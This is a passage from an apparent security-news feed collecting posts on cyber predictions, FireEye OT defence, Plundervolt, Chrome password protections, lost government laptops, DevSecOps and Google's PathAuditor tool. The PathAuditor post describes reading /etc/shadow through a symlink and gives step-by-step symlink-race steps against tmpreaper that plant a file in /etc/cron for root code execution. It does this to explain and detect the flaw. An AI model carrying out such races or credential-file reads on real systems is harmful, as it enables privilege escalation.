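        return "new"
    return "old"

sessions = [f"session-{i}" for i in range(1000)]
canary_share = sum(handler_for(s) == "new" for s in sessions) / len(sessions)
print(f"canary share: {canary_share:.1%}")  # roughly CANARY_PERCENT

FLAGS["new-checkout"] = False  # errors found: kill the canary instantly
assert all(handler_for(s) == "old" for s in sessions)
```

Hash-based bucketing keeps each user's experience consistent across requests, which matters when the old and new code paths differ visibly.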

Production security tests: Note that it is common for applications to continue to function even when security controls fail. Consider employing penetration testers to examine the application at runtime for flaws.

Learn More

By embracing the role changes brought about by DevOps and working with developers to add security tools and techniques into the software delivery lifecycle, you can successfully transition to DevSecOps.

Get more detailed information on building out a DevSecOps program in the Securosis report, Building an Enterprise DevSecOps Program.

5 Cybersecurity Predictions For 2020

While it may be true that nobody can predict the future, when it comes to cybersecurity you can give it a good go. By looking at the security developments that we have witnessed over the past few years, it is perfectly possible to forecast what is likely to happen in the near future.

Plus, with 2020 just around the corner, now is the time to do exactly that. Staying ahead of the game and doing all you can to avoid the risk of a cyber-attack is vital; and what better way is there to do just that than by preparing yourself in advance.

From the rise of 5G to the implementation of AI, here are five cybersecurity predictions for the coming year.

  1. Targeted ransomware.

While many people see advances in technology as a good thing, that progress has been accompanied by a rise in people’s susceptibility to cyber-attacks. As time has moved on, ransomware has become more and more targeted against specific businesses, and that doesn’t look set to change in 2020.

In fact, it looks like it’s going to get worse.

Rather than initiating a cyber-attack at the first available opportunity, attackers are now biding their time, gathering intelligence on their soon-to-be victims. In doing so, this enables them to inflict maximum disruption and scale up their ransom demands accordingly.

  2. Cyber-attack? Go phish.

A cyber resilience study by the FSB found there are an incredible seven million cyber-crimes against small businesses every year. A large proportion of these attacks came via what’s known as ‘phishing’ – a type of attack used by cybercriminals masquerading as a trusted person or business to steal data. Using a malicious link, these criminals dupe victims into opening a damaging email, instant message or text message.

As time moves forward, this type of attack is going to become more and more difficult to identify, especially when you consider the growing culture of big data. Email is currently the most popularly used channel for these kinds of attack but, over the next year, cybercriminals will likely start using alternative methods, such as social media messaging and gaming platforms, to target their attacks.

  3. More devices, more problems.

Next year looks set to be the year of 5G – a new data network promising higher internet speeds than ever before. While this is very exciting, the implementation of this network will also bring with it an explosion in the numbers of connected devices and sensors across the world – from connected car services to eHealth applications.

As a result, more data will be being collected than ever before which, in turn, will heighten the potential for data theft. In order to protect against this, cybersecurity firms will therefore need to look at designing effective systems capable of minimising the risk.

  4. Artificial aid.

Most of the pre-existing security solutions available today have been built using human logic. While that may have been fine in the past, as we move forward into an ever-growing technological world, keeping informed about the latest threats is almost impossible manually. Therefore, cybersecurity firms will need to think of new, advanced ways to combat threats – and fast.

Fortunately, this is where artificial intelligence (AI) comes in. Using AI in cyber security is a great way of identifying and responding to threats before they can spread. Utilising this in cyber defence mechanisms can and will need to take centre stage in the coming months, but firms will also need to remain cautious about its potential; cybercriminals will also be able to take advantage of AI, using innovative techniques to identify vulnerabilities and infiltrate networks.

  5. Head in the cloud.

The increasing reliance on public cloud infrastructure only heightens the likelihood of being targeted by cybercriminals. After all, the more exposed a business is, the more at risk it will be.

Therefore, over the next 12 months, many companies will begin looking at their existing data centres and thinking about creating a hybrid cloud environment for their public and private data. This, in turn, will improve their level of data protection and safeguard them from data loss incidents, such as Google’s cloud outage earlier this year.

In conclusion…

Today’s interconnected world provides a wealth of opportunities for cybercriminals and cyber security firms alike. While this may make it sound like a bit of a cat and mouse contest, it’s anything but. By being able to predict what might happen in the coming year, cybersecurity providers can stay ahead of the game and use advanced threat intelligence to develop effective counteractive systems.

The post 5 Cybersecurity Predictions For 2020 appeared first on CyberDB.

NIST Releases Data to Help Measure Accuracy of Biometric Identification

New biometric research data — ranging from fingerprints to facial photographs and iris scans — is now available from the National Institute of Standards and Technology (NIST). Stripped of identifying information and created expressly for research purposes, the data is designed primarily for testing systems that verify a person’s identity before granting access — be it to another room or another country. Few available resources exist to help developers evaluate the performance of the software algorithms that form the heart of these systems, and the NIST data will help fill that gap.

The FireEye Approach to Operational Technology Security

Today FireEye launches the Cyber Physical Threat Intelligence subscription, which provides cyber security professionals with unmatched context, data and actionable analysis on threats and risk to cyber physical systems. In light of this release, we thought it would be helpful to explain FireEye’s philosophy and broader approach to operational technology (OT) security. In summary, combined visibility into both the IT and OT environments is critical for detecting malicious activity at any stage of an OT intrusion. The FireEye approach to OT security is to:

Detect threats early using full situational awareness of IT and OT networks.

The surface area of most intrusions transcends architectural layers because at almost every level along the way there are computers (servers and workstations) and networks using the same or similar operating systems and protocols as IT, which serve as an avenue of approach for impacting physical assets or taking control of a physical process. The oft-touted air gap is, in many cases, a myth.

There is often a singular focus from the security community on industrial control system (ICS) malware largely due to its novel nature and the fact that there have been very few examples found. This attention is useful for a variety of reasons, but disproportionate to the actual methods of the intrusions where ICS-tailored malware is used. In the attacks utilizing Industroyer and TRITON, the attackers moved from the IT network to the OT network through systems that were accessible to both environments. Traditional malware backdoors, Mimikatz extracts, remote desktop sessions and other well-documented, easily detected attack methods were used throughout these intrusions and found at every level of the IT, IT DMZ, OT DMZ and OT environments.

We believe that defenders and incident responders should focus much more attention on intrusion methods, or TTPs, across the attack lifecycle, most of which are present on what we call “intermediary systems”—predominantly networked workstations and servers using operating systems and protocols that are similar to or the same as those used in IT, which are used as stepping-stones to gain access to OT assets. This approach is effective because almost all sophisticated OT attacks leverage these systems as stepping stones to their ultimate target.

To illustrate this philosophy, we present some new concepts for approaching OT threats, including the Funnel of Opportunity for OT Threat Detection and the Theory of 99, as well as practical examples derived from our analysis and incident response work. We hope these ideas challenge others in the security community to put forward new ideas and drive discussion and collaboration. We strive for a world where attacking or disrupting ICS operations costs the threat actor their cover, their toolkits, their time and their freedom.

The "Funnel of Opportunity" Highlights the Value of Detecting OT Attacks In "Intermediary Systems"

Over the past 15 years of responding to and analyzing many of the most important threats in IT and OT, FireEye observed a consistent pattern across almost all OT security incidents: There is an inverse relationship between the presence of an attacker’s activities and the severity of consequence to physical assets or processes. The attack lifecycle when viewed like this begins to take on a “funnel” shape, representing both the breadth of attacker footprint and the breadth of detection opportunity for any given level. Similarly, from top to bottom we represent the timeline of the intrusion and its proximity to the physical world. The bottom is the cross-over of impact from the cyber world to the physical world.


Figure 1: The Funnel of Opportunity for OT Threat Detection

In the early stages of the attack lifecycle, the intruder spends prolonged periods of time targeting components such as servers and workstations across IT and the IT DMZ. Identifying threat activity at this architectural level is relatively straightforward given that dwell time is high, threat actors often leave visible traces, and there are many mature security tools, services and other capabilities designed to detect this activity. While it is difficult to anticipate or associate this early intrusion activity in IT layers with more complex OT targeted attacks, IT networks remain the best zone to detect attacks.

In addition to being relatively easy to detect, early attacker activity also presents a very low risk of negative impact to OT networks. This is primarily because OT networks are commonly segmented, often with an OT DMZ separating them from IT, limiting attacker access to the industrial process. Also, targeted OT attacks commonly require threat actors to acquire abundant process documentation to determine how to cause a desired outcome. While some of this information may be available in IT networks, planning this type of attack would almost certainly require further process visibility only available in the OT network. This is why, as the intrusion progresses and the attacker gets closer or gains access to OT networks, the severity of possible negative outcomes becomes proportionally higher. However, the activity becomes more difficult to detect as the attacker’s footprint grows smaller and there are fewer security tools available to defenders.

The TRITON and Industroyer Attacks Exemplify This Phenomenon

Figure 2 shows an approximate representation of endpoints that were compromised across the architecture of victim organizations during the TRITON and Industroyer attacks. The Funnel of Opportunity is located in the intersection between the two triangles. It is here where the balance between attacker presence and operational consequence of an intrusion makes it easier and more meaningful for security organizations to identify threat activity. As a result, threat hunting close to the OT DMZ and DCS represents the most efficient approach as the detectable features of the intrusion are still present and the severity of potential consequences of the intrusion is high, but still not critical.


Figure 2: Approximate representation of endpoints compromised during the TRITON and Industroyer attacks

In both the TRITON and Industroyer incidents, the threat actor followed a consistent pattern traversing the victims’ architecture from IT networks, through the OT network, and ultimately reaching the physical process controls. In both incidents, we observed that the actor moved through segmented architectures using computers located in different zones. While we only illustrated two incidents in this blog post, we highlight that movement across zones leveraging computers has also been observed in every public OT security incident to date.

The Theory of 99: Almost All Threat Activity Happens in Windows and Linux Systems

FireEye’s unique visibility into the full attack lifecycle of thousands of intrusions from both independent research and first-hand incident response experience has enabled us to support this theory with real-world data, some of which we share here. FireEye has consistently identified similar TTPs leveraged by threat actors regardless of their target industry or ultimate goals. We believe that visibility into network traffic and endpoint behaviors are some of the most important components for IT security. These components are also critical in preventing pivots to key assets in the OT network and detecting threat activity once it does reach OT.

Our observations can be summarized in what we call the Theory of 99, which states that in intrusions that go deep enough to impact OT:

  • 99% of compromised systems will be computer workstations and servers
  • 99% of malware will be designed for computer workstations and servers
  • 99% of forensics will be performed on computer workstations and servers
  • 99% of detection opportunities will be for activity connected to computer workstations and servers
  • 99% of intrusion dwell time happens in commercial off-the-shelf (COTS) computer equipment before any Purdue level 0-1 devices are impacted

As a result, there is often a significant overlap across TTPs utilized by threat actors targeting both IT and OT networks.


Figure 3: TTPs seen across both IT and OT incidents

Figure 3 presents a summary of TTP overlaps between TRITON, Industroyer, and some relatively common activity from cybercrime group FIN6. FIN6 is a group of intrusion operators who have compromised multiple point-of-sale (POS) environments to steal payment card data and sell it on the dark web. While the motivations and ultimate goal of the threat actors that developed TRITON and Industroyer differ significantly from FIN6, the three actors share common TTPs, including the use of Meterpreter, compromising dual-homed systems, leveraging RDP to establish remote connections and so forth. The overlap in tools and TTPs across actors interested in IT and OT should be of no surprise. The use of IT tools for OT compromises directly corresponds to a trend best known as IT/OT convergence. As IT equipment increasingly becomes integrated in OT systems and networks to improve efficiency and manageability, we can expect threat actors to be able to leverage networked computers as a conduit to reach industrial controls.

Drawing parallels between intrusions into high security environments, we can gain insight into actor behaviors and identify detection opportunities earlier in the attack lifecycle. Intelligence on intrusions across various sectors can be useful in highlighting which common and emerging adversary tools and TTPs are likely to be used in tailored attacks against organizations with OT assets.

FireEye Services, Intelligence, and Technology Provide Unparalleled Protection In IT and OT

While the FireEye approach to OT security detailed in this blog post emphasizes the criticality of “intermediary systems” when defending OT, we do not want to downplay the importance of the OT expertise and technology needed to respond to the most critical 1% of threat activity that does impact control systems. OT is in our DNA at FireEye: FireEye Mandiant’s OT practice has been one of the leading industry voices over the past six years, and the FireEye Cyber Physical Intelligence offering is the most recent evolution of the heritage of Critical Intelligence—the first commercial OT threat intelligence company founded in 2009.


Figure 4: FireEye OT-specific offerings

We believe that sharing our philosophy for OT security and highlighting FireEye’s comprehensive OT security capabilities will help organizations look at this security challenge from a different angle and take tangible steps forward to build a robust, all-encompassing security program. Figure 4 maps FireEye’s OT security offerings against the NIST Cybersecurity Framework’s Five Functions, matching FireEye services to the lifecycle of an organization’s cyber security risk management.

If you are interested in learning more or purchasing FireEye OT-focused solutions, you can reach out here: FireEye OT Solutions.

Next Up! Cybersecurity Framework Webinar: Helping Small & Medium-sized Businesses to manage Cybersecurity Risks

Note: Captioning will be available by 12/20/19.

Resources mentioned during the webinar:
  • National Cyber Security Alliance (NCSA) – https://staysafeonline.org/
  • Manufacturing Extension Partnership (MEP) – https://www.nist.gov/mep
  • Small Business Development Centers (SBDCs) – https://americassbdc.org/
  • NIST Small Business Cybersecurity Corner (SBCC) – https://www.nist.gov/itl/smallbusinesscyber

Speaker Bios: Patricia Toth, NIST
Pat is the Cybersecurity Program Manager at the NIST Manufacturing Extension Partnership (MEP). She works with MEP Centers nationwide to

Plundervolt! A new Intel Processor ‘undervolting’ Vulnerability

Researchers at the University of Birmingham have identified a weakness in Intel’s processors: by 'undervolting' the CPU, Intel’s secure enclave technology becomes vulnerable to attack.
A little bit of undervolting can cause a lot of problems

Modern processors are being pushed to perform faster than ever before – and with this comes increases in heat and power consumption. To manage this, many chip manufacturers allow frequency and voltage to be adjusted as and when needed – known as ‘undervolting’ or ‘overvolting’. This is done through privileged software interfaces, such as a “model-specific register” in Intel Core processors.

An international team of researchers from the University of Birmingham’s School of Computer Science along with researchers from imec-DistriNet (KU Leuven) and Graz University of Technology has been investigating how these interfaces can be exploited in Intel Core processors to undermine the system’s security in a project called Plundervolt.

Results, released today and accepted to IEEE Security & Privacy 2020, show how the team was able to corrupt the integrity of Intel SGX on Intel Core processors by controlling the voltage when executing enclave computations (enclaves being a method used to shield sensitive computations, for example from malware). This means that even Intel SGX's memory encryption and authentication technology cannot protect against Plundervolt.

Intel has already responded to the security threat by supplying a microcode update to mitigate Plundervolt. The vulnerability is tracked as CVE-2019-11157 and has a CVSS base score of 7.9 (high).
David Oswald, Senior Lecturer in Computer Security at the University of Birmingham, says: “To our knowledge, the weakness we’ve uncovered will only affect the security of SGX enclaves. Intel responded swiftly to the threat and users can protect their SGX enclaves by downloading Intel’s update.”

Better password protections in Chrome – How it works



Today, we announced better password protections in Chrome, gradually rolling out with release M79. Here are the details of how they work.


Warnings about compromised passwords
Google first introduced password breach warnings as a Password Checkup extension early this year. It compares passwords and usernames against over 4 billion credentials that Google knows to have been compromised. You can read more about it here. In October, Google built the Password Checkup feature into the Google Account, making it available from passwords.google.com.

Chrome’s integration is a natural next step to ensure we protect even more users as they browse the web. Here is how it works:
  • Whenever Google discovers a username and password exposed by another company’s data breach, we store a hashed and encrypted copy of the data on our servers with a secret key known only to Google.
  • When you sign in to a website, Chrome will send a hashed copy of your username and password to Google encrypted with a secret key only known to Chrome. No one, including Google, is able to derive your username or password from this encrypted copy.
  • In order to determine if your username and password appear in any breach, we use a technique called private set intersection with blinding that involves multiple layers of encryption. This allows us to compare your encrypted username and password with all of the encrypted breached usernames and passwords, without revealing your username and password, or revealing any information about any other users’ usernames and passwords. In order to make this computation more efficient, Chrome sends a 3-byte SHA256 hash prefix of your username to reduce the scale of the data joined from 4 billion records down to 250 records, while still ensuring your username remains anonymous.
  • Only you discover if your username and password have been compromised. If they have been compromised, Chrome will tell you, and we strongly encourage you to change your password.
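The hash-prefix bucketing step described above can be sketched as follows. This is only an illustration of the anonymization idea: the `username_bucket` and `candidate_records` names and the index layout are hypothetical, and the private-set-intersection layer that protects the actual comparison is omitted.

```python
import hashlib

def username_bucket(username: str) -> bytes:
    """3-byte SHA-256 prefix used to select a bucket of breached
    records; the prefix alone does not identify the username."""
    return hashlib.sha256(username.encode("utf-8")).digest()[:3]

def candidate_records(breach_index: dict, username: str) -> list:
    """Fetch only the small bucket of records sharing this prefix; the
    real comparison then happens under encryption (not shown here)."""
    return breach_index.get(username_bucket(username), [])

# hypothetical server-side index: 3-byte prefix -> encrypted breached records
index = {username_bucket("alice@example.com"): ["<encrypted record>"]}
print(candidate_records(index, "alice@example.com"))  # ['<encrypted record>']
```

The 3-byte prefix shrinks 4 billion records to a bucket of roughly 250 candidates while keeping the queried username ambiguous among millions of possible inputs.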
You can control this feature in the “Sync and Google Services” section of Chrome Settings. Enterprise admins can control this feature using the PasswordLeakDetectionEnabled policy setting.


Real-time phishing protection: Checking with Safe Browsing’s blocklist in real time.
Chrome’s new real-time phishing protection is also expanding existing technology — in this case it’s Google’s well-established Safe Browsing.

Every day, Safe Browsing discovers thousands of new unsafe sites and adds them to the blocklists shared with the web industry. Chrome checks the URL of each site you visit or file you download against this local list, which is updated approximately every 30 minutes. If you navigate to a URL that appears on the list, Chrome checks a partial URL fingerprint (the first 32 bits of a SHA-256 hash of the URL) with Google for verification that the URL is indeed dangerous. Google cannot determine the actual URL from this information.
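The partial fingerprint is simple to illustrate; here is a minimal sketch of the prefix computation (the function name is illustrative, and Safe Browsing's URL canonicalization step, which is applied before hashing, is omitted):

```python
import hashlib

def url_fingerprint_prefix(canonical_url: str) -> bytes:
    """First 32 bits (4 bytes) of the SHA-256 hash of a URL: the
    partial fingerprint sent to Google for verification."""
    return hashlib.sha256(canonical_url.encode("utf-8")).digest()[:4]

# the full URL cannot be recovered from these 4 bytes alone
print(url_fingerprint_prefix("http://example.com/bad-page").hex())
```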

However, we’re noticing that some phishing sites slip through our 30-minute refresh window, either by switching domains very quickly or by hiding from Google's crawlers.

That’s where real-time phishing protections come in. These new protections check the URLs of pages you visit against Safe Browsing’s servers in real time. When you visit a website, Chrome first checks it against a list stored on your computer of thousands of popular websites that are known to be safe. If the website is not on the safe-list, Chrome checks the URL with Google (after dropping any username or password embedded in the URL) to find out if you're visiting a dangerous site. Our analysis has shown that this results in a 30% increase in protections by warning users on malicious sites that are brand new.

We will initially roll out this feature to people who have already opted in to the “Make searches and browsing better” setting in Chrome. Enterprise administrators can manage this setting via the UrlKeyedAnonymizedDataCollectionEnabled policy setting.


Expanding predictive phishing protection
Your password is the key to your online identity and data. If this key falls into the hands of attackers, they can easily impersonate you and get access to your data. We launched predictive phishing protections to warn users who are syncing history in Chrome when they enter their Google Account password into suspected phishing sites that try to steal their credentials.

With this latest release, we’re expanding this protection to everyone signed in to Chrome, even if you have not enabled Sync. In addition, this feature will now work for all the passwords you have stored in Chrome’s password manager.

If you type one of your protected passwords (this could be a password you stored in Chrome’s password manager, or the Google Account password you used to sign in to Chrome) into an unusual site, Chrome classifies this as a potentially dangerous event.

In such a scenario, Chrome checks the site against a list on your computer of thousands of popular websites that are known to be safe. If the website is not on the safe-list, Chrome checks the URL with Google (after dropping any username or password embedded in the URL). If this check determines that the site is indeed suspicious or malicious, Chrome will immediately show you a warning and encourage you to change your compromised password. If it was your Google Account password that was phished, Chrome also offers to notify Google so we can add additional protections to ensure your account isn't compromised.
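Conceptually, detecting reuse requires only salted hashes of the protected passwords, never their plaintext. Below is a minimal sketch of that idea; the function names, PBKDF2 parameters, and in-memory store are illustrative assumptions, not Chrome's actual implementation.

```python
import hashlib
import hmac
import os

# illustrative salt; a real implementation would persist this securely
SALT = os.urandom(16)

def protect(password: str) -> bytes:
    """Store only a salted, stretched hash of a protected password."""
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), SALT, 100_000)

def is_reuse(typed: str, protected_hashes: list) -> bool:
    """Flag when text typed into an unfamiliar site matches a protected
    password (constant-time comparison to avoid timing leaks)."""
    h = protect(typed)
    return any(hmac.compare_digest(h, p) for p in protected_hashes)

store = [protect("hunter2")]        # hypothetical protected password
print(is_reuse("hunter2", store))   # True
print(is_reuse("letmein", store))   # False
```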

By watching for password reuse, Chrome can give heightened security in critical moments while minimizing the data it shares with Google. We think predictive phishing protection will protect hundreds of millions more people.

MoJ Reports Over 400% Increase in Lost Laptops in Three Years

Apricorn, the leading manufacturer of software-free, 256-bit AES XTS hardware-encrypted USB drives, today announced new findings from Freedom of Information (FoI) requests submitted to five government departments into the security of devices held by public sector employees. The Ministry of Justice (MoJ) lost 354 mobile phones, PCs, laptops and tablet devices in FY 2018/19, compared with 229 in 2017/18. The number of lost laptops alone has risen from 45 in 2016/17 to 101 in 2017/18 and 201 in 2018/19, an increase of more than 400% over three years.

FoI requests were submitted to the MoJ, Ministry of Education (MoE), Ministry of Defence (MoD), NHS Digital and NHS England during September-November 2019; three of the five departments responded. The MoE also reported 91 devices lost or stolen in 2019, whilst NHS Digital has lost 35 to date in 2019.

“Whilst devices are easily misplaced, it’s concerning to see such vast numbers being lost and stolen, particularly given the fact these are government departments ultimately responsible for volumes of sensitive public data. A lost device can pose a significant risk to the government if it is not properly protected,” said Jon Fielding, Managing Director, EMEA, Apricorn.

When questioned about the use of USB and other storage devices in the workplace, or when working remotely, all three departments confirmed that employees use USB devices. The MoJ added that all USB ports on laptops and desktops are restricted and can only be used when individuals have requested that the ports be unlocked. Each of the responding departments noted that all USB and storage devices are encrypted.

“Modern-day mobile working is designed to support the flexibility and efficiency increasingly required in 21st-century roles, but this also means that sensitive data is often stored on mobile and laptop devices. If a device that is not secured is lost and ends up in the wrong hands, the repercussions can be hugely detrimental, even more so with GDPR now in full force”, noted Fielding.

In a survey by Apricorn earlier this year, roughly a third (32%) of respondents said that their organisation had already experienced a data loss or breach as a direct result of mobile working and to add to this, 30% of respondents from organisations where the General Data Protection Regulation (GDPR) applies were concerned that mobile working is an area that will most likely cause them to be non-compliant.

All responding sectors did confirm that they have security policies in place that cover all mobile, storage and laptop devices.

“Knowing that these government departments have policies in place to protect sensitive data is somewhat reassuring, however, they need to be doing a lot more to avoid the risk of a data breach resulting from these lost devices. Corporately approved, hardware encrypted storage devices should be provided as standard. These should be whitelisted on the IT infrastructure, blocking access to all non-approved media. Should a device then ‘go missing’ the data cannot be accessed or used inappropriately,” Fielding added.

About the FoI Requests
The research was conducted through Freedom of Information requests submitted through Whatdotheyknow.com. The requests, submitted between September and November 2019, along with the successful responses can be found at: https://www.whatdotheyknow.com/list/successful.

Optiv Announces New Software Assurance as-a-Service Offering Powered by Veracode

In an effort to help drive collaboration between security, development, and operations, improve speed to market, and ensure software is secure from the start, Optiv has released its new Software Assurance as-a-Service (SAaaS) offering. This program pairs Optiv’s consulting and security services with Veracode’s cloud-based, end-to-end application security solutions to give companies a programmatic approach to DevSecOps.

In today’s world, every company is a software company and, as a result, one of the top attack vectors for software-driven and supported organizations is the application. Just as development teams are increasingly integrating automated security into their workflows, security teams are looking for support to plan, build, and run strong application security programs that deliver on the overarching goals of the business.

Through SAaaS, DevSecOps teams are assisted with detection, analysis, and response to application vulnerabilities with Veracode Static Analysis, Veracode Dynamic Analysis, and Veracode Software Composition Analysis. In order to ensure that the flaws aren’t just found, but also fixed, the Optiv SAaaS solution is inclusive of software assurance expertise for code review, threat modeling, SDLC workshops, architectural review, and program development.

Optiv SAaaS enables modern organizations of all sizes and maturity levels to take advantage of a highly scalable platform and seamless integration to build a customized AppSec program that delivers secure software faster. This offering can help companies empower their development and security teams, lower their security risk, and turn security into a competitive advantage.

Learn more here.

Detecting unsafe path access patterns with PathAuditor



#!/bin/sh
cat /home/user/foo


What can go wrong if this command runs as root? Does it change anything if foo is a symbolic link to /etc/shadow? How is the output going to be used?

Depending on the answers to the questions above, accessing files this way could be a vulnerability. The vulnerability exists in syscalls that operate on file paths, such as open, rename, chmod, or exec. For a vulnerability to be present, part of the path has to be user controlled and the program that executes the syscall has to be run at a higher privilege level. In a potential exploit, the attacker can substitute the path for a symlink and create, remove, or execute a file. In many cases, it's possible for an attacker to create the symlink before the syscall is executed.
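One partial mitigation in privileged code is to refuse to follow a symlink in the final path component. The sketch below shows this with `O_NOFOLLOW`; note that fully guarding intermediate path components would require step-by-step `openat()` resolution, which is omitted here.

```python
import os
import tempfile

def open_untrusted_path(path: str) -> int:
    """Open a file read-only without following a symlink in the final
    path component; raises OSError (ELOOP) if it is a symlink."""
    return os.open(path, os.O_RDONLY | os.O_NOFOLLOW)

# demo in a scratch directory
with tempfile.TemporaryDirectory() as d:
    real = os.path.join(d, "foo")
    link = os.path.join(d, "link")
    open(real, "w").close()
    os.symlink(real, link)                 # pretend an attacker planted this
    os.close(open_untrusted_path(real))    # regular file: fine
    try:
        open_untrusted_path(link)          # symlink: refused
    except OSError as e:
        print("refused, errno", e.errno)
```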

At Google, we have been working on a solution to find these potentially problematic issues at scale: PathAuditor. In this blog post we'll outline the problem and explain how you can avoid it in your code with PathAuditor.

Let’s take a look at a real world example. The tmpreaper utility contained the following code to check if a directory is a mount point:
/* tmpreaper's check: try renaming "name" to "name/X"; rename() failing
   with EXDEV ("cross-device link") indicates a mount point */
if ((dst = malloc(strlen(ent->d_name) + 3)) == NULL)
    message(LOG_FATAL, "malloc failed.\n");
strcpy(dst, ent->d_name);
strcat(dst, "/X");
rename(ent->d_name, dst);
if (errno == EXDEV) {
[...]


This code will call rename("/tmp/user/controlled", "/tmp/user/controlled/X"). Under the hood, the kernel will resolve the path twice, once for the first argument and once for the second, then perform some checks if the rename is valid and finally try to move the file from one directory to the other.

However, the problem is that the user can race the kernel code and replace “/tmp/user/controlled” with a symlink between the two path resolutions.

A successful attack would look roughly like this:
  • Make “/tmp/user/controlled” a file with controlled content.
  • The kernel resolves that path for the first argument to rename() and sees the file.
  • Replace “/tmp/user/controlled” with a symlink to /etc/cron.
  • The kernel resolves the path again for the second argument and ends up in /etc/cron.
  • If both the tmp and cron directories are on the same filesystem, the kernel will move the attacker controlled file to /etc/cron, leading to code execution as root.
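For comparison, a race-free way to test for a mount point is to compare device IDs rather than rename anything. A sketch of that approach (this is essentially what Python's `os.path.ismount` does; it is offered here as an alternative, not as tmpreaper's fix):

```python
import os

def is_mount_point(path: str) -> bool:
    """Mount-point test with no filesystem writes: a directory is a
    mount point if its device ID differs from its parent's, or if it
    is the root (where the directory and its parent are the same inode)."""
    st = os.lstat(path)
    parent = os.lstat(os.path.join(path, ".."))
    return st.st_dev != parent.st_dev or st.st_ino == parent.st_ino

print(is_mount_point("/"))  # True
```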
Can we find such bugs via automated analysis? Well, yes and no. As shown in the tmpreaper example, exploiting these bugs can require some creativity, and whether they are vulnerabilities in the first place depends on the context. Automated analysis can uncover instances of this access pattern and gather as much information as possible to help with further investigation. However, it will also naturally produce false positives.

We can’t tell if a call to open(/user/controlled, O_RDONLY) is a vulnerability without looking at the context. It depends on whether the contents are returned to the user or are used in some security sensitive way. A call to chmod(/user/controlled, mode) depending on the mode can be either a DoS or a privilege escalation. Accessing files in sticky directories (like /tmp) can become vulnerabilities if the attacker found an additional bug to delete arbitrary files.

How PathAuditor works

To find issues like this at scale we wrote PathAuditor, a tool that monitors file accesses and logs potential vulnerabilities. PathAuditor is a shared library that can be loaded into processes using LD_PRELOAD. It then hooks all filesystem related libc functions and checks if the access is safe. For that, we traverse the path and check if any component could be replaced by an unprivileged user, for example if a directory is user-writable. If we detect such a pattern, we log it to syslog for manual analysis.

Here's how you can use it to find vulnerabilities in your code:
  • LD_PRELOAD the library to your binary and then analyse its findings in syslog. You can also add the library to /etc/ld.so.preload, which will preload it in all binaries running on the system.
  • It will then gather the PID and command line of the calling process, the arguments of the vulnerable function, and a stack trace -- this provides a starting point for further investigation. From there, you can use the stack trace to find the code path that triggered the violation and manually analyse what would happen if you pointed the path at an arbitrary file or directory.
  • For example, if the code is opening a file and returning the content to the user then you could use it to read arbitrary files. If you control the path of chmod or chown, you might be able to change the permissions of chosen files and so on.
PathAuditor has proved successful at Google and we're excited to share it with the community. The project is still in the early stages and we are actively working on it. We look forward to hearing about any vulnerabilities you discover with the tool, and hope to see pull requests with further improvements.

Try out the PathAuditor tool here.

Marta Rożek was a Google Summer intern in 2019 and contributed to this blog and the PathAuditor tool.

It's Time to Help Defend Organizations Worldwide

Folks,

I trust this finds you all doing well. It has been a few months since I last blogged - pardon the absence. I had to focus my energies on helping the world get some perspective, getting 007G ready for launch, and dealing with a certain nuisance.

Having successfully accomplished all three objectives, it is TIME to help defend organizations worldwide from the SPECTRE of potentially colossal compromise, a real cyber security risk that looms over 85% of organizations worldwide.


When you know as much as I do, care as much as I do, and possess as much capability as I do, you not only shoulder a great responsibility, you almost have an obligation to educate the whole world about cyber security risks that threaten their security.

So, even though I barely have any time to do this, in the interest of foundational cyber security worldwide, I'm going to start sharing a few valuable perspectives again, and do so on this blog, that blog and the official PD blog (see below).


Speaking of which, earlier this week, I had the PRIVILEGE to launch the official PD blog -  https://blog.paramountdefenses.com


Stay tuned for some valuable cyber security insights right here from January 06, 2020,
and let me take my leave with a befitting (and one of my favorite) song(s) -



Best wishes,
Sanjay.


PS: Just a month ago, the $ Billion Czech cyber security company Avast was substantially compromised, and guess what the perpetrators used to compromise them? They used the EXACT means I had clearly warned about TWO years ago, right here.


DevSecOps Challenges From a Security Perspective

The transition from DevOps to DevSecOps requires security professionals to have a whole new understanding of development processes, priorities, tools, and pain points. It’s no longer feasible for security professionals to get by with a superficial understanding of how developers work. But gaining this understanding can be a significant undertaking for most security pros who haven’t previously been immersed in the development side of the house.

In its new report, Building an Enterprise DevSecOps Program, analyst firm Securosis notes of security teams and DevSecOps, “Their challenge is to understand what development is trying to accomplish, integrate with them in some fashion, and figure out how to leverage automated security testing to be at least as agile as development.”

In this same paper, Securosis highlights the questions security professionals most often ask about DevSecOps, which include “Can we realistically modify developer behavior?”, “What tools do we start with to ‘shift left’?” and “How do we integrate security testing into the development pipeline?” These are all valid and important questions, but Securosis points out that there are also questions security teams should be asking, but aren’t, including:

  • How do we fit, operationally and culturally, into DevSecOps?
  • How do we get visibility into Development and their practices?
  • How do we know changes are effective? What metrics should we collect and monitor?
  • How do we support Development?
  • Do we need to know how to code?

The questions the security team is currently asking are about security tasks in DevSecOps; the questions they aren’t asking are about how to understand and work with the development organization. And those are the questions they should start asking. Where to start? The key development areas security teams need to understand when trying to get a handle on application security include the following:

Process: At the very least understand why development processes have changed over the years, what they are trying to achieve, and make sure security testing embraces the same ideals.

Developer tools: You need to understand the tools developers use to manage the code they are building, so you know where code can be inspected for security issues.

Code: Security tests are shifting left and looking at code, not fully developed applications. The traditional thinking about security audits needs to shift as well.

Open source: You would be hard-pressed to find an app that isn’t made up primarily of open source code. Understand why, and then work with the development team to help them continue to use open source code, but in a secure way.

How security tools affect developer processes: Make sure the security tools you select integrate with the tools and processes developers already use and don’t slow them down with false positives.

Cultural dynamics: You need to fully understand the development team’s goals and priorities, which are most often centered around speed. That understanding is key to getting developer buy-in and acceptance.

SDLC: It’s best practice to include some kind of security analysis in each phase of the software lifecycle. For instance, threat modeling during design, and software composition analysis during development. In this way, you establish a process-independent AppSec program that will work with varying development processes.

For more details on these development areas and practical advice on building an effective DevSecOps program, check out the full Securosis report.

Accelerated Digital Innovation to impact the Cybersecurity Threat Landscape in 2020

It's December and the Christmas lights are going up, so it can't be too early for cyber predictions for 2020. With this in mind, Richard Starnes, Chief Security Strategist at Capgemini, sets out what the priorities will be for businesses in 2020 and beyond.


Accelerated digital innovation is a double-edged sword that will continue to hang over the cybersecurity threat landscape in 2020.  As businesses rapidly chase digital transformation and pursue the latest advancements in 5G, cloud and IoT, they do so at the risk of exposing more of their operations to cyber-attacks. These technologies have caused an explosion in the number of end-user devices, user interfaces, networks and data; the sheer scale of which is a headache for any cybersecurity professional. 

In order to aggressively turn the tide next year, cyber analysts can no longer avoid AI adoption or ignore the impact of 5G. 

AI Adoption
